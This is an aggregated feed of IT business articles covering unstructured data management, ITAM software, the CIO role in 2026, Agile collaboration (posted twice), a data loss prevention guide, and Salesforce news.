Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

Why CIOs need a new approach to unstructured data management

16 January 2026 at 05:00

CIOs everywhere will be familiar with the major issues caused by collecting and retaining data at an increasingly rapid rate. Industry research shows 64% of enterprises manage at least 1 Petabyte of data, creating substantial cost, governance and compliance pressures.

If that wasn’t enough, organizations frequently default to retaining these enormous datasets, even when they are no longer needed. To put this into context, the average useful life of most enterprise data has now shrunk to 30–90 days; however, for various reasons, businesses continue to store it indefinitely, thereby adding to the cost and complexity of their underlying infrastructure.

As much as 90% of this information comes in the form of unstructured data files spread across hybrid, multi-vendor environments with little to no centralized oversight. This can include everything from MS Office docs to photo and video content routinely used by the likes of marketing teams, for example. The list is extensive, stretching to invoices, service reports, log files and in some organizations even scans or faxes of hand-written documents, often dating back decades.

In these circumstances, CIOs often lack clear visibility into what data exists, where it resides, who owns it, how old it is or whether it holds any business value. This matters because in many cases, it has tremendous value with the potential to offer insight into a range of important business issues, such as customer behaviour or field quality challenges, among many others.

With the advent of GenAI, it is now realistic to use the knowledge embedded in all kinds of documents and to retrieve their high-quality (i.e., relevant, useful and correct) content. This is even possible for documents having a low visual/graphical quality. As a result, running AI on a combination of structured and unstructured input can reconstruct the entire enterprise memory and the so-called “tribal knowledge”.

Visibility and governance

The first point to appreciate is that the biggest challenge is not the amount of data being collected and retained, but the absence of meaningful visibility into what is being stored.

Without an enterprise-wide view (a situation common to many organizations), teams cannot determine which data is valuable, which is redundant, or which poses a risk. In particular, metadata remains underutilised, even though insights such as creation date, last access date, ownership, activity levels and other basic indicators can immediately reveal security risks, duplication, orphaned content and stale data.

Visibility begins by building a thorough understanding of the existing data landscape. This can be done by using tools that scan storage platforms across multi-vendor and multi-location environments, collect metadata at scale, and generate virtual views of datasets. This allows teams to understand the size, age, usage and ownership of their data, enabling them to identify duplicate, forgotten or orphaned files.

It’s a complex challenge. In most cases, some data will be on-premises, some in the cloud, some stored as files and some as objects (such as S3 or Azure), all of which can be on-prem or in the cloud. In these circumstances, the multi-vendor infrastructure strategy adopted by many organizations is a sound strategy as it facilitates data redundancy and replication while also protecting against increasingly common cloud outages, such as those seen at Amazon and CloudFlare.

With visibility tools and processes in place, the next requirement is to introduce governance frameworks that bring structure and control to unstructured data estates. Good governance enables CIOs to align information with retention rules, compliance obligations and business requirements, reducing unnecessary storage and risk.

It’s also dependent on effective data classification processes, which help determine which data should be retained, which can be relocated to lower-cost platforms and which no longer serve a purpose. Together, these processes establish clearer ownership and ensure data is handled consistently across the organization while also providing the basis for reliable decision-making by ensuring that data remains accurate. Without it, visibility alone cannot deliver operational or financial benefits, because there is no framework for acting on what the organization discovers.

Lifecycle management

Once CIOs have a clear view of what exists and a framework to control it, they need a practical method for acting on those findings across the data lifecycle. By applying metadata-based policies, teams can migrate older or rarely accessed data to lower-cost platforms, thereby reducing pressure on primary storage. Files that have not been accessed for an extended period can be relocated to more economical systems, while long-inactive data can be archived or removed entirely if appropriate.

A big part of the challenge is that the data lifecycle is now much longer than it used to be, a situation that has profoundly affected how organizations approach storage strategy and spend.

For example, datasets considered ‘active’ will typically be stored on high- or mid-performance systems. Once again, there are both on-premises and cloud options to consider, depending on the use case, but typically they include both file and object requirements.

As time passes (often years), data gradually becomes eligible for archival. It is then moved to an archive venue, where it is better protected but may become less accessible or require more checks before access. Inside the archive, it can (after even more years) be tiered to cheaper storage such as tape. At this point, data retrieval times might range from minutes to hours, or even days. In each case, archived data is typically subject to all kinds of regulations and can be used during e-discovery.

In most circumstances, it is only after this stage has been reached that data is finally eligible to be deleted.

When organizations take this approach, many discover that a significant proportion of their stored information falls into the inactive or long-inactive category. Addressing this issue immediately frees capacity, reduces infrastructure expenditure and helps prevent the further accumulation of redundant content.

Policy-driven lifecycle management also improves operational control. It ensures that data is retained according to its relevance rather than by default and reduces the risk created by carrying forgotten or outdated information. It supports data quality by limiting the spread of stale content across the estate and provides CIOs with a clearer path to meeting retention and governance obligations.

What’s more, at a strategic level, lifecycle management transforms unstructured data from an unmanaged cost into a controlled process that aligns storage with business value. It strengthens compliance by ensuring only the data required for operational or legal reasons is kept, and it improves readiness for AI and analytics initiatives by ensuring that underlying datasets are accurate and reliable.

To put all these issues into perspective, the business obsession with data shows no sign of slowing up. Indeed, the growing adoption of AI technologies is raising the stakes even further, particularly for organizations that continue to prioritize data collection and storage over management and governance. As a result, getting data management and storage strategies in order sooner rather than later is likely to rise to the top of the to-do list for CIOs across the board.

This article is published as part of the Foundry Expert Contributor Network.
Want to join?

The capabilities CIOs should demand from IT asset management software in 2026

7 January 2026 at 11:10

According to recent research by Freshworks, organizational complexity accounts for 7% of total annual revenue loss for an average business. Software is a major contributor, with companies estimating a loss of $1 out of every $5 spent on total software due to complexity, including IT complexity. That’s time, talent, and money that could instead be fueling innovation, improving customer experience, and driving expansion.

IT asset management (ITAM) solutions are one of the most effective ways to combat software complexity. They provide tools for recording, categorizing, and organizing technology assets, giving IT leaders visibility across hardware, software, and cloud resources. Beyond reducing cost and operational complexity, ITAM mitigates business risk: unused or poorly tracked software can create security vulnerabilities, increase points of failure, and expose organizations to audit and compliance issues—especially in regulated industries. Acting as a central hub, ITAM ensures accurate data, supports better decisions, streamlines operations, and maintains compliance.

How should CIOs go about choosing the right ITAM platform?

The best ITAM software does more than track inventory. It provides unified visibility across all assets, automates lifecycle processes, and integrates tightly with IT service management so asset data drives operational decisions. The right platform depends on asset scale, regulatory requirements, and ITSM maturity. CIOs should prioritize solutions that turn asset data into actionable intelligence rather than static records.

At a minimum, leading ITAM platforms should deliver:

  • Unified asset visibility across hardware, software, cloud, and SaaS
  • End-to-end lifecycle automation, from procurement to retirement
  • Native ITSM integration that connects assets to incidents, changes, and SLAs

What capabilities define full-lifecycle IT asset management?

  • Acquisition & procurement to onboard vendors and capture cost data
  • Deployment to assign assets, update inventory, and validate configurations
  • Usage & operation to monitor performance, usage, incidents, and changes
  • Maintenance to manage patching, warranty tracking, and scheduled service
  • Retirement & disposal to decommission assets, perform secure wipes, manage disposition, and maintain audit trails

The most effective platforms manage all of these stages within a single workflow, rather than across disconnected tools.

How do leading ITAM platforms support ITSM workflows?

The strongest IT asset lifecycle platforms are deeply integrated with IT service management systems. Assets are not static records, but rather operational entities tied to SLAs, incidents, and changes.

For example, when an incident is logged, the service desk can immediately identify the affected device, its dependencies, warranty status, and change history. Automated workflows can trigger asset reassignment during employee offboarding or initiate refresh cycles when hardware reaches end of life.

This tight coupling between ITAM and ITSM improves resolution times, supports root-cause analysis, and enables proactive service delivery.

What capabilities should CIOs look for in ITAM solutions?

The best ITAM solutions support end-to-end visibility and automation at scale. Key features to look for include: 

  1. Centralized hardware & software inventory to track laptops, servers, mobile devices, SaaS applications, licenses, and virtual assets in a single system of record
  2. Automated discovery & dependency mapping to identify assets using agent-based and agentless scanning, network discovery, and configuration management database (CMDB) relationships, and to understand how assets interact
  3. SaaS license & software management to reduce spend through license utilization insights, unused seat reclamation, automated renewal visibility, and contract linkage
  4. Lifecycle tracking from procurement to disposal to effectively monitor every aspect of assets, including purchase cost, warranties, depreciation, maintenance events, assignment history, and end-of-life milestones 
  5. Workflow automation to automate lifecycle activities such as onboarding and device assignment, patching and maintenance, asset return workflows, and retirement approvals.
  6. Contract, vendor & compliance governance to maintain operational efficiency and compliance through renewal reminders, contract metadata, vendor performance reviews, audit readiness, and lifecycle governance
  7. Integrations & API support to connect with HRIS (for onboarding and offboarding), procurement systems, SSO/SaaS management tools, MDM solutions, service desks, and related platforms

Freshservice: An integrated approach to ITAM and ITSM in practice

These capabilities come together in practice when ITAM and ITSM are designed as a single, integrated system, an approach embodied by Freshservice from Freshworks. With asset lifecycle management and an integrated CMDB, organizations track resources across every stage and gain visibility into how assets interact. By unifying ITAM and ITSM, teams can automate workflows, maintain compliance, and make faster, data-driven decisions.

To find out more, click here.

7 changes to the CIO role in 2026

7 January 2026 at 05:00

Everything is changing, from data pipelines and technology platforms, to vendor selection and employee training — even core business processes — and CIOs are in the middle of it to guide their companies into the future.

In 2024, tech leaders asked themselves if this AI thing even works and how do you do it. Last year, the big question was what the best use cases are for the new technology. This year will be all about scaling up and starting to use AI to fundamentally transform how employees, business units, or even entire companies actually function.

So whatever IT was thought of before, it’s now a driver of restructuring. Here are seven ways the CIO role will change in the next 12 months.

Enough experimenting

The role of the CIO will change for the better in 2026, says Eric Johnson, CIO at incident management company PagerDuty, with a lot of business benefit and opportunity in AI.

“It’s like having a mine of very valuable minerals and gold, and you’re not quite sure how to extract it and get full value out of it,” he says. Now, he and his peers are being asked to do just that: move out of experimentation and into extraction.

“We’re being asked to take everything we’ve learned over the past couple of years and find meaningful value with AI,” he says.

What makes this extra challenging is the pace of change is so much faster now than before.

“What generative AI was 12 months ago is completely different to what it is today,” he says. “And the business folks watching that transformation occur are starting to hear of use cases they never heard of months ago.”

From IT manager to business strategist

The traditional role of a company’s IT department has been to provide technology support to other business units.

“You tell me what the requirements are, and I’ll build you your thing,” says Marcus Murph, partner and head of technology consulting at KPMG US.

But the role is changing from back-office order taker to full business partner working alongside business leaders to leverage innovation.

“My instincts tell me that for at least the next decade, we’ll see such drastic change in technology that they won’t go back to the back office,” he says. “We’re probably in the most rapid hyper cycle of change at least since the internet or mobile phones, but almost certainly more than that.”

Change management

As AI transforms how people do their jobs, CIOs will be expected to step up and help lead the effort.

“A lot of the conversations are about implementing AI solutions, how to make solutions work, and how they add value,” says Ryan Downing, VP and CIO of enterprise business solutions at Principal Financial Group. “But the reality is with the transformation AI is bringing into the workplace right now, there’s a fundamental change in how everyone will be working.”

This transformation will challenge everyone, he says, in terms of roles, value proposition of what’s been done for years, and expertise.

“The technology we’re starting to bring into the workplace is really shaping the future of work, and we need to be agents of change beyond the tech,” he says.

That change management starts within the IT organization itself, adds Matt Kropp, MD and senior partner and CTO at Boston Consulting Group.

“There’s quite a lot of focus on AI for software development because it’s maybe the most advanced, and the tools have been around for a while,” he says. “There’s a very clear impact using AI agents for software developers.”

The lessons that CIOs learn from managing this transformation can be applied in other business units, too, he says.

“What we see happening with AI for software development is a canary in the coal mine,” he adds. And it’s an opportunity to ensure the company is getting the productivity gains it’s looking for, but also to create change management systems that can be used in other parts of the enterprise. And it starts with the CIO.

“You want the top of the organization saying they expect everyone to use AI because they use it, and can demonstrate how they use it as part of their work,” he says. Leaders need to lead by example that the use of AI is allowed, accepted, and expected.

CIOs and other executives can use AI to create first drafts of memos, organize meeting notes, and help them think through strategy. And any major technology initiative will include a change management component, yet few technologies have had as dramatic an impact on work as AI is having, and is expected to have.

Deploying AI at scale in an enterprise, however, is a very contentious issue, says Ari Lightman, a professor at Carnegie Mellon University. Companies have spent a lot of time focusing on understanding the customer experience, he says, but few focus on the employee experience.

“When you roll out enterprise-wide AI systems, you’re going to have people who are supportive and interested, and people who just want to blow it up,” he says. Without addressing the issues that employees have, AI projects can grind to a halt.

Cleaning up the data

As AI projects scale up, so will their data requirements. Instead of limited, curated data sets, enterprises will need to modernize their data stacks if they haven’t already, and make the data ready and accessible for AI systems while ensuring security and compliance.

“We’re thinking about data foundations and making sure we have the infrastructure in place so AI is something we can leverage and get value out of,” says Aaron Rucker, VP of data at Warner Music.

The security aspect is particularly important as AI agents gain the ability to autonomously seek out and query data sources. This was much less of a concern with small pilot projects or RAG embedding, where developers carefully curated the data that was used to augment AI prompts. And before gen AI, data scientists, analysts, and data engineers were the ones accessing data, which offered a layer of human control that might diminish or completely vanish in the agentic age. That means the controls will need to move closer to the data itself.

“With AI, sometimes you want to move fast, but you still want to make sure you’re setting up data sources with proper permissions so someone can’t just type in a chatbot and get all the family jewels,” says Rucker.

Make build vs buy decisions

This year, the build or buy decisions for AI will have dramatically bigger impacts than they did before. In many cases, vendors can build AI systems better, quicker, and cheaper than a company can do it themselves. And if a better option comes along, switching is a lot easier than when you’ve built something internally from scratch. On the other hand, some business processes represent core business value and competitive advantage, says Rucker.

“HR isn’t a competitive advantage for us because Workday is going to be better positioned to build something that’s compliant” he says. “It wouldn’t make sense for us to build that.”

But then there are areas where Warner Music can gain a strategic advantage, he says, and it’s going to be important to figure out what this advantage is going to be when it comes to AI.

“We shouldn’t be doing AI for AI’s sake,” says Rucker. “We should attach it to some business value as a reflection of our company strategy.”

If a company uses outside vendors for important business processes, there’s a risk the vendor will come to understand an industry better than the existing players.

Digitizing a business process creates behavioral capital, network capital, and cognitive capital, says John Sviokla, executive fellow at the Harvard Business School and co-founder of GAI Insights. It unlocks something that used to be exclusively inside the minds of employees.

Companies have already traded their behavioral capital to Google and Facebook, and network capital to Facebook and LinkedIn.

“Trading your cognitive capital for cheap inference or cheap access to technology is a very bad idea,” says Sviokla. Even if the AI company or hyperscaler isn’t currently in a particular line of business, this gives them the starter kit to understand that business. “Once they see a massive opportunity, they can put billions of dollars behind it,” he says.

Platform selection

As AI moves from one-off POCs and pilot projects to deployments at scale, companies will have to come to grips with choosing an AI platform, or platforms.

“With things changing so fast, we still don’t know who’s going to be the leaders in the long term,” says Principal’s Downing. “We’re going to start making some meaningful bets, but I don’t think the industry is at the point where we pick one and say that’s going to be it.”

The key is to pick platforms that have the ability to scale, but are decoupled, he says, so enterprises can pivot quickly, but still get business value. “Right now, I’m prioritizing flexibility,” he says.

Bret Greenstein, chief AI officer at management consulting firm West Monroe Partners, recommends CIOs identify aspects of AI that are stable, and those that change rapidly, and make their platform selections accordingly.

“Keep your AI close to the cloud because the cloud is going to be stable,” he says. “But the AI agent frameworks will change in six months, so build to be agnostic in order to integrate with any agent frameworks.”

Progressive CIOs are building the enterprise infrastructure of tomorrow and have to be thoughtful and deliberate, he adds, especially around building governance models.

Revenue generation

AI is poised to massively transform business models across every industry. This is a threat to many companies, but also an opportunity for others. By helping to create new AI-powered products and services, CIOs can make IT a revenue generator instead of just a cost center.

“You’re going to see this notion of most IT organizations directly building tech products that enable value in the marketplace, and change how you do manufacturing, provide services, and how you sell a product in a store,” says KPMG’s Murph.

That puts IT much closer to the customer than it had been before, raising its profile and significance in the organization, he says.

“In the past, IT was one level away from the customer,” he says. “They enabled the technology to help business functions sell products and services. Now with AI, CIOs and IT build the products, because everything is enabled by technology. They go from the notion of being services-oriented to product-oriented.”

One CIO already doing this is Amith Nair at Vituity, a national physician group serving 13.8 million patients.

“We’re building products internally and providing them back to the hospital system, and to external customers,” he says.

For example, doctors spend hours a day transcribing conversations with patients, which is something AI can help with. “When a patient comes in, they can just have a conversation,” he says. “Instead of looking at the computer and typing, they look at and listen to the patient. Then all of their charting, medical decision processes, and discharge summaries are developed using a multi-agent AI platform.”

The tool was developed in-house, custom-built on top of the Microsoft Azure platform, and is now a startup running on its own, he says.

“We’ve become a revenue generator,” he says.

How Agile Project Management Improves Team Collaboration and Productivity

3 January 2026 at 02:22

Have you ever noticed how some teams move smoothly while others struggle with delays and confusion? Many professionals exploring a PRINCE2 Course are now curious about how Agile Project Management fits into modern teamwork. Agile is not about rushing work. It is about working together better. It creates space for clear communication, shared ownership, and steady progress. When teams collaborate well, productivity follows naturally. Agile focuses on people first and plans second, which helps teams adapt without stress.  

In this blog, let us explore how Agile strengthens collaboration and improves productivity in a simple, practical way. 

Table of Contents

  • Why Agile Creates Stronger Team Connections
  • How Agile Project Management Helps Teams Work Better Together
  • Conclusion

Why Agile Creates Stronger Team Connections

Agile fosters a tighter bond between team members and the work itself. Teams collaborate in brief cycles rather than lengthy handovers or discrete tasks. Everyone is aware of what is going on and why it is important right now. Confidence is increased, and uncertainty is eliminated early due to this shared visibility. 

Teams can maintain alignment without lengthy meetings by having regular conversations. Issues are brought up early and resolved together. People instinctively support one another and talk honestly when they feel connected.

How Agile Project Management Helps Teams Work Better Together

Below are the key ways Agile improves collaboration and boosts productivity across project teams: 

Shared Ownership Improves Accountability

Instead of operating in silos, agile encourages teams to assume collective accountability. One role does not own all of the tasks. The team as a whole is dedicated to results and advancement. 

Delays and finger-pointing are decreased by this shared ownership. When assistance is required, people act without waiting for orders. Work proceeds more quickly as a result, and accountability feels encouraged rather than coerced.

Short Feedback Cycles Keep Work on Track 

Agile depends on regular feedback to direct development. Teams frequently examine their work and make minor adjustments rather than major ones afterwards. This maintains attention on the things that offer value. 

Stakeholder engagement is also maintained through feedback. There are fewer shocks and clear expectations. Teams that constantly learn and adapt see increases in production without additional strain. 

Clear Priorities Reduce Overload

Agile assists teams in concentrating on the most important tasks at hand. Long task lists are not used to prioritise work; instead, value and impact are considered. This avoids mental exhaustion and overburden.

Teams cease multitasking and begin completing tasks once priorities are established. Instead of constantly switching, energy is expended on significant advancement. This clarity promotes consistent and long-term productivity. 

Better Communication Builds Team Confidence 

Agile communication is straightforward, consistent, and truthful. Without complicated reporting, teams regularly exchange updates. At any given time, everyone is aware of the status of the task.

This transparency increases stakeholder and team trust. Because information is visible, decisions are made more quickly. When communication is straightforward and effortless, confidence increases. 

Flexible Planning Supports Real World Change 

Agile acknowledges that project work involves change. Plans are reviewed frequently and modified as necessary. Teams can react to new information more composedly thanks to this adaptability.

Teams embrace change to achieve better outcomes rather than fight it. Work continues to be relevant and in line with objectives. Planning that is flexible maintains momentum and reduces frustration.

Continuous Improvement Strengthens Team Performance 

Agile encourages teams to consider not only what they produce but also how they operate. Frequent evaluations assist in determining what is effective and what requires modification.
 
Over time, minor adjustments frequently result in greater performance. Every cycle makes teams more competent and self-assured. This emphasis on education keeps productivity rising. 

Visible Progress Keeps Teams Motivated 

Agile allows all parties to see progress. Work is divided into manageable chunks, and advancement is routinely assessed. By doing this, teams are able to observe outcomes sooner rather than later. 

Motivation and confidence are increased by observable progress. As work progresses gradually, teams get a sense of accomplishment. Additionally, stakeholders benefit from clarity, which lessens pressure and needless follow-ups. Teams remain engaged, and productivity stays constant when progress is seen.

Conclusion

Agile is more than a delivery approach. It is a way of working that improves how teams communicate, collaborate, and perform. By encouraging shared ownership, clear priorities, and regular feedback, Agile helps productivity grow naturally. Teams feel more connected, confident, and focused. For professionals looking to balance flexibility with structure, PRINCE2 Training can support combining Agile ways of working with proven project control to deliver strong outcomes in modern project environments. 

How Agile Project Management Improves Team Collaboration and Productivity

3 January 2026 at 00:45

Have you ever noticed how some teams move smoothly while others struggle with delays and confusion? Many professionals exploring a PRINCE2 Course are now curious about how Agile Project Management fits into modern teamwork. Agile is not about rushing work. It is about working together better. It creates space for clear communication, shared ownership, and steady progress. When teams collaborate well, productivity follows naturally. Agile focuses on people first and plans second, which helps teams adapt without stress.  

In this blog, let us explore how Agile strengthens collaboration and improves productivity in a simple, practical way. 

Table of Contents

  • Why Agile Creates Stronger Team Connections
  • How Agile Project Management Helps Teams Work Better Together
  • Conclusion

Why Agile Creates Stronger Team Connections

Agile fosters a tighter bond between team members and the work itself. Teams collaborate in brief cycles rather than lengthy handovers or discrete tasks. Everyone is aware of what is going on and why it is important right now. Confidence is increased, and uncertainty is eliminated early due to this shared visibility. 

Teams can maintain alignment without lengthy meetings by having regular conversations. Issues are brought up early and resolved together. People instinctively support one another and talk honestly when they feel connected.

How Agile Project Management Helps Teams Work Better Together

Below are the key ways Agile improves collaboration and boosts productivity across project teams: 

Shared Ownership Improves Accountability

Instead of operating in silos, agile encourages teams to assume collective accountability. One role does not own all of the tasks. The team as a whole is dedicated to results and advancement. 

Delays and finger-pointing are decreased by this shared ownership. When assistance is required, people act without waiting for orders. Work proceeds more quickly as a result, and accountability feels encouraged rather than coerced.

Short Feedback Cycles Keep Work on Track 

Agile depends on regular feedback to direct development. Teams frequently examine their work and make minor adjustments rather than major ones afterwards. This maintains attention on the things that offer value. 

Stakeholder engagement is also maintained through feedback. There are fewer shocks and clear expectations. Teams that constantly learn and adapt see increases in production without additional strain. 

Clear Priorities Reduce Overload

Agile assists teams in concentrating on the most important tasks at hand. Long task lists are not used to prioritise work; instead, value and impact are considered. This avoids mental exhaustion and overburden.

Teams cease multitasking and begin completing tasks once priorities are established. Instead of constantly switching, energy is expended on significant advancement. This clarity promotes consistent and long-term productivity. 

Better Communication Builds Team Confidence 

Agile communication is straightforward, consistent, and truthful. Without complicated reporting, teams regularly exchange updates. At any given time, everyone is aware of the status of the task.

This transparency increases stakeholder and team trust. Because information is visible, decisions are made more quickly. When communication is straightforward and effortless, confidence increases. 

Flexible Planning Supports Real World Change 

Agile acknowledges that project work involves change. Plans are reviewed frequently and modified as necessary. Teams can react to new information more composedly thanks to this adaptability.

Teams embrace change to achieve better outcomes rather than fight it. Work continues to be relevant and in line with objectives. Planning that is flexible maintains momentum and reduces frustration.

Continuous Improvement Strengthens Team Performance 

Agile encourages teams to consider not only what they produce but also how they operate. Frequent evaluations assist in determining what is effective and what requires modification.
 
Over time, minor adjustments frequently result in greater performance. Every cycle makes teams more competent and self-assured. This emphasis on education keeps productivity rising. 

Visible Progress Keeps Teams Motivated 

Agile allows all parties to see progress. Work is divided into manageable chunks, and advancement is routinely assessed. By doing this, teams are able to observe outcomes sooner rather than later. 

Motivation and confidence are increased by observable progress. As work progresses gradually, teams get a sense of accomplishment. Additionally, stakeholders benefit from clarity, which lessens pressure and needless follow-ups. Teams remain engaged, and productivity stays constant when progress is seen.

Conclusion

Agile is more than a delivery approach. It is a way of working that improves how teams communicate, collaborate, and perform. By encouraging shared ownership, clear priorities, and regular feedback, Agile helps productivity grow naturally. Teams feel more connected, confident, and focused. For professionals looking to balance flexibility with structure, PRINCE2 Training can support combining Agile ways of working with proven project control to deliver strong outcomes in modern project environments. 

Data Loss Prevention Framework and Lifecycle – Complete Guide

21 December 2025 at 11:21
Data Loss Prevention Framework and Lifecycle – Complete Guide (2025)
Data Loss Prevention Framework and Lifecycle – Complete Guide (2025)

Data Loss Prevention Framework and Lifecycle: A Complete Guide

In the high-stakes digital environment of 2025, Data Loss Prevention (DLP) has evolved from a backend security utility into a front-line strategic capability. As organizations confront the dual pressures of AI-driven cyber threats and increasingly complex regulatory obligations, a mature DLP framework delivers the visibility required to manage human risk and safeguard proprietary algorithms. When integrated into a Zero Trust architecture, DLP ensures that sensitive data remains protected—even as it traverses decentralized, cloud-native, and highly automated workflows.

The Strategic Value of Modern DLP

Modern DLP programs extend far beyond traditional data blocking mechanisms. They now play a critical role in strengthening organizational resilience, enabling regulatory agility, and reinforcing digital trust:

  • Visibility into Shadow AI: Advanced DLP solutions detect and restrict unauthorized use of consumer-grade large language models (LLMs), preventing employees from unintentionally exposing proprietary data to public AI training environments.
  • Mitigation of Deepfake-Driven Phishing: By continuously monitoring outbound data flows, DLP acts as a protective layer against AI-powered social engineering attacks that exploit human trust to exfiltrate sensitive information.
  • Operational Resilience Against Ransomware: Beyond data protection, DLP enhances business continuity by identifying ransomware-as-a-service (RaaS) activity at the data exfiltration stage—often before encryption or system disruption occurs.
  • Regulatory Speed-to-Market: With the EU AI Act and evolving GDPR requirements now in force, automated data discovery and classification within DLP enable organizations to scale into new markets without costly, manual compliance rework.
  • Enhanced Insider Risk Management: Behavioral analytics embedded within DLP platforms distinguish legitimate business activity from anomalous or malicious data movement, significantly reducing time to detect insider-driven incidents.
  • Cloud Ecosystem Security: As cloud misconfigurations remain a leading cause of breaches, DLP provides a unified policy enforcement layer that protects sensitive data across hybrid and multi-cloud environments.
  • Quantum-Era Preparedness: Forward-looking DLP strategies are beginning to incorporate quantum-resistant cryptographic controls to mitigate “harvest now, decrypt later” threats targeting long-lived sensitive data.
  • Trust as a Competitive Differentiator: In an environment marked by frequent data breaches, a demonstrable and well-governed DLP posture strengthens customer confidence and becomes a decisive factor in B2B partnerships.
  • Supply Chain Data Protection: DLP extends governance controls beyond organizational boundaries, reducing exposure from third-party vendors and mitigating risks associated with supply chain-based data attacks.
  • Autonomous Security Through Agentic AI: Next-generation DLP platforms leverage agentic AI to autonomously quarantine sensitive data, revoke access, and enforce policies in real time—shifting defense from human response speed to machine-speed enforcement.

What Is Data Loss Prevention (DLP)?

In the high-stakes digital environment of 2025, Data Loss Prevention (DLP) has evolved from a simple gatekeeping tool into a sophisticated ecosystem of policies, tools, and controls designed to safeguard the lifeblood of modern enterprise: information. By enforcing strict protocols to prevent unauthorized access, leakage, or misuse, a mature DLP strategy ensures that sensitive data—whether it is "at rest" in local databases, "in motion" across global networks, or "in use" during collaborative sessions—remains both secure and compliant with intensifying global mandates. The modern necessity for DLP is driven by a surge in AI-powered cyber threats and Deepfake phishing, which have made traditional perimeter defenses nearly obsolete. As organizations migrate to decentralized work, they are increasingly adopting a Zero Trust architecture, where DLP acts as the final verification layer to ensure that even "authenticated" users cannot move sensitive assets without specific authorization. This is particularly critical as Agentic AI—autonomous systems capable of making their own decisions—begins to navigate corporate data, requiring DLP to monitor machine-to-machine interactions just as closely as human ones. Furthermore, the rise of Cloud security challenges and Supply chain attacks has pushed DLP to integrate more deeply with Continuous Threat Exposure Management (CTEM), allowing security teams to see risk in real-time. Organizations are also preparing for the future of "harvest now, decrypt later" by investing in Quantum-resistant cryptography, ensuring that even if data is leaked, it remains unreadable to future adversaries. Ultimately, with Ransomware-as-a-Service (RaaS) and Insider threats reaching all-time highs, DLP serves as the essential "Human Risk Management" tool, providing the visibility needed to detect Shadow AI usage and maintain trust in an increasingly volatile digital world.

Understanding the Data Lifecycle

  • Creation: Data is generated or modified
  • Storage: Data stored in databases or cloud
  • Use: Data accessed or processed
  • Sharing: Data transmitted externally
  • Archival: Long-term retention
  • Destruction: Secure disposal

DLP Framework Components

A mature Data Loss Prevention (DLP) framework is far more than just a software installation; it is a holistic lifecycle that begins with data discovery, where automated tools scan the entire ecosystem—from on-premise servers to cloud environments—to identify where sensitive information resides. Once located, data classification applies persistent metadata tags to these files based on their sensitivity, such as PII, PHI, or intellectual property, ensuring the system understands the value of what it is protecting. Following this, policy enforcement acts as the frontline defense, utilizing granular rules to block, encrypt, or alert when data movements violate security protocols. To ensure long-term efficacy, continuous monitoring provides real-time visibility into data egress points and user behavior, allowing the organization to detect anomalies before they result in a breach. When a violation does occur, a streamlined incident response workflow ensures that security teams can quickly contain the threat and investigate the root cause. Finally, the cycle is completed through rigorous audit reporting, which generates the necessary documentation to demonstrate regulatory compliance to stakeholders and governing bodies. This integrated approach transforms DLP from a reactive tool into a proactive pillar of an organization's overall cybersecurity posture and data governance strategy.

ISO 27001:2022 Alignment (Advisory CTA)

DLP Knowledge Quiz (10 Questions)

1. What is the primary goal of DLP?

2. Data being transferred via email is known as?

3. Which ISO 27001 clause focuses on risk treatment?

4. Which DLP technique tracks unique data patterns?

5. Endpoint DLP mainly protects against?

6. Which Annex A domain covers information protection?

7. False positives occur due to?

8. Cloud DLP primarily protects?

9. Secure deletion belongs to which lifecycle phase?

10. Continuous monitoring maps to which ISO clause?

Frequently Asked Questions

What is DLP in cybersecurity?
DLP prevents unauthorized data leakage across systems.
Is DLP mandatory for ISO 27001?
Not explicitly, but Annex A controls strongly support DLP.
Does DLP work in cloud?
Yes, via API-based cloud DLP integrations.
What data does DLP protect?
PII, IP, financial, and regulated data.
Can DLP stop insider threats?
Yes, especially endpoint-based DLP.
Is AI used in DLP?
Yes, for classification and anomaly detection.
What is data in use?
Data actively accessed or processed.
How does DLP reduce compliance risk?
By enforcing policies and generating audit evidence.
Can DLP impact performance?
If misconfigured, yes — tuning is essential.
Is DLP a one-time setup?
No, it requires continuous improvement.

Salesforce: Latest news and insights

7 January 2026 at 11:11

Salesforce (NYSE:CRM) is a vendor of cloud-based software and applications for sales, customer service, marketing automation, ecommerce, analytics, and application development. Based in San Francisco, Calif., its services include Sales Cloud, Service Cloud, Marketing Cloud, Commerce Cloud, and Salesforce Platform. Its subsidiaries include Tableau Software, Slack Technologies, and MuleSoft, among others.

The company is undergoing a pivot to agentic AI, increasingly focused on blending generative AI with a range of other capabilities to offer customers the ability to develop autonomous decision-making agents for their service and sales workflows. Salesforce has a market cap of $293 billion, making it the world’s 36th most valuable company by market cap.

Salesforce news and analysis

Salesforce’s Agentforce recalibration raises costs and complexity for CIOs

January 7, 2026: Salesforce is recalibrating its enterprise AI strategy — and CIOs could be footing the bill. Analysts warn the move will force CIOs to absorb new costs, revisit delivery timelines, and defend AI decisions that were once marketed as autonomous.

Salesforce is tightening control of its data ecosystem and CIOs may have to pay the price

December 17, 2025: Software partners are now feeling the impact of changes Salesforce announced in February to how it charges for API access and are weighing whether to absorb the higher the costs, pass them on to customers and risk backlash, or pursue alternative ways to access the data and risk straining its relationship with Salesforce.

Salesforce’s Agentforce 360 gets an enterprise data backbone with Informatica’s metadata and lineage engine

December 9, 2025: While studies suggest that a high number of AI projects fail, many experts argue that it’s not the model’s fault, it’s the data behind it. Salesforce aims to tackle this problem with the integration of its newest acquisition, Informatica.

Salesforce unveils observability tools to manage and optimize AI agents

November 20, 2025: Salesforce unveiled new Agentforce 360 observability tools to give teams visibility into why AI agents behave the way they do, and which reasoning paths they follow to reach decisions.

Salesforce unveils simulation environment for training AI agents

November 14, 2025: Salesforce AI Research today unveiled a new simulation environment for training voice and text agents for the enterprise. Dubbed eVerse, the environment leverages synthetic data generation, stress testing, and reinforcement learning to optimize agents.

Salesforce to acquire Doti to boost AI-based enterprise search via Slack

November 14, 2025: Salesforce wii acquire Israeli startup, Doti, aiming to enhance AI-based enterprise search capabilities offered via Slack. The demand for efficient data retrieval and interpretation has been growing within enterprises, driven by the need to streamline workflows and increase productivity.

Salesforce’s glaring Dreamforce omission: Vital security lessons from Salesloft Drift

October 22, 2025: Salesforce’s Dreamforce conference offered a range of sessions on best practices for securing their Salesforce environments and AI agents, but what it didn’t address were weaknesses exposed by the recent spate of Salesforce-related breaches.

Salesforce updates its agentic AI pitch with Agentforce 360

October 13, 2025: Salesforce has announced a new release of Agentforce that, it said, “gives teams the fastest path from AI prototypes to production-scale agents” — although with many of the new release’s features still to come, or yet to enter pilot phases or beta testing, some parts of that path will be much slower than others.

Lessons from the Salesforce breach

